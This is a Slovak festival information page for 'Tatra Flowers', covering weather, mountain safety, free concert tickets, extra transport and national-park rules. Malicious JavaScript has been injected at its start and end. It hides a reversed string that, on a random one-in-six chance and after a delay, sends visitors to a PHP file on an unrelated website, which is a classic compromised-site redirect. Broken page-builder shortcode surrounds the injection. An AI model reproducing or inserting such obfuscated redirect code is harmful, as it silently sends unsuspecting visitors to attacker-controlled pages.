) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}top“ undefined=““ background_repeat=“no-repeat“ border_size=“0″ border_color=““ border_style=“solid“ border_position=“all“ padding=“30px 40px 30px 40px“ margin_top=““ margin_bottom=““ animation_type=““ animation_direction=“left“ animation_speed=“0.3″ animation_offset=““ last=“no“]

Dôležité informácie k festivalu

[fusion_separator style_type=“none“ hide_on_mobile=“small-visibility,medium-visibility,large-visibility“ sep_color=“#ffffff“ top_margin=“30″ border_size=“0″ alignment=“center“ /]

Milí účastníci Tatra Flowers! Máme pre vás informácie, ktoré ste od nás počas príprav festivalu viackrát pýtali.

1. Počasie sledujeme na viacerých stránkach o počasí. O aktuálnom počasí a prípadných zmenách programu z dôvodu nepriaznivého počasia vás budeme informovať na našej stránke a na našom evente Tatra Flowers. Všetky koncerty sú v tejto chvíli naplánované bez zmien. Sledujte náš FB a web.

2. Pristúpte, prosím, k vášmu pobytu v Tatrách zodpovedne po všetkých stránkach. Nepodceňte vhodné a kvalitné oblečenie, obuv a prípravu na každé počasie.

3. Stiahnite si aplikáciu Záchranná horská služba na Android alebo iOS a sledujte aktuálne informácie o situácii na horách. Okrem toho vám odporúčame založiť si poistenie na pobyt v horách.

4. Koncerty Michala Matejčíka sú obmedzené kapacitou. Musíme sa všetci zmestiť do kostolíka v Tatranskej Lomnici a do sály Grand hotela Starý Smokovec, preto si na tieto koncerty treba vyzdvihnúť voľné vstupenky v infocentre na Štrbskom Plese. Jeden človek môže dostať max. 2 lístky. Vstupenky nie je možné rezervovať.

5. Posilnili sme dopravu medzi Štrbským Plesom a Tatranskou Štrbou v sobotu 2.9., aby ste sa po koncerte Jany a SĽUK-u mohli pohodlne dostať domov, alebo na bezplatné parkovisko v Tatranskej Štrbe. Tento spoj bude pre vás pripravený na stanici Štrbské Pleso s odchodom o 21.30 hod. a bude zadarmo.

6. Správajte sa v Tatrách zodpovedne a rozumne. Prosíme vás o dodržiavanie pravidiel správania sa v Národnom parku. Nezabudnite na vrecko, v ktorom sa vaše odpadky bezpečne dostanú opäť dole a skončia tam, kde patria. Takto spoločne neublížime Tatrám a ich krásnej prírode.

7. Téryho Chata: horský chodník na Téryho chatu je označený ako stredne ťažká túra. Preto vám odporúčame kvalitnú obuv, dobré oblečenie do hôr, nainštalovať aplikáciu HZS a poistenie do hôr. Na Téryho chate už nie je k dispozícii žiadne ubytovanie.

Tešíme sa na vás už tento víkend.

[fusion_separator style_type=“none“ hide_on_mobile=“small-visibility,medium-visibility,large-visibility“ sep_color=“#ffffff“ top_margin=“10″ border_size=“0″ alignment=“center“ /]
) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}top“ undefined=““ background_repeat=“no-repeat“ border_size=“0″ border_color=““ border_style=“solid“ border_position=“all“ padding=““ margin_top=““ margin_bottom=““ animation_type=““ animation_direction=“left“ animation_speed=“0.3″ animation_offset=““ last=“no“]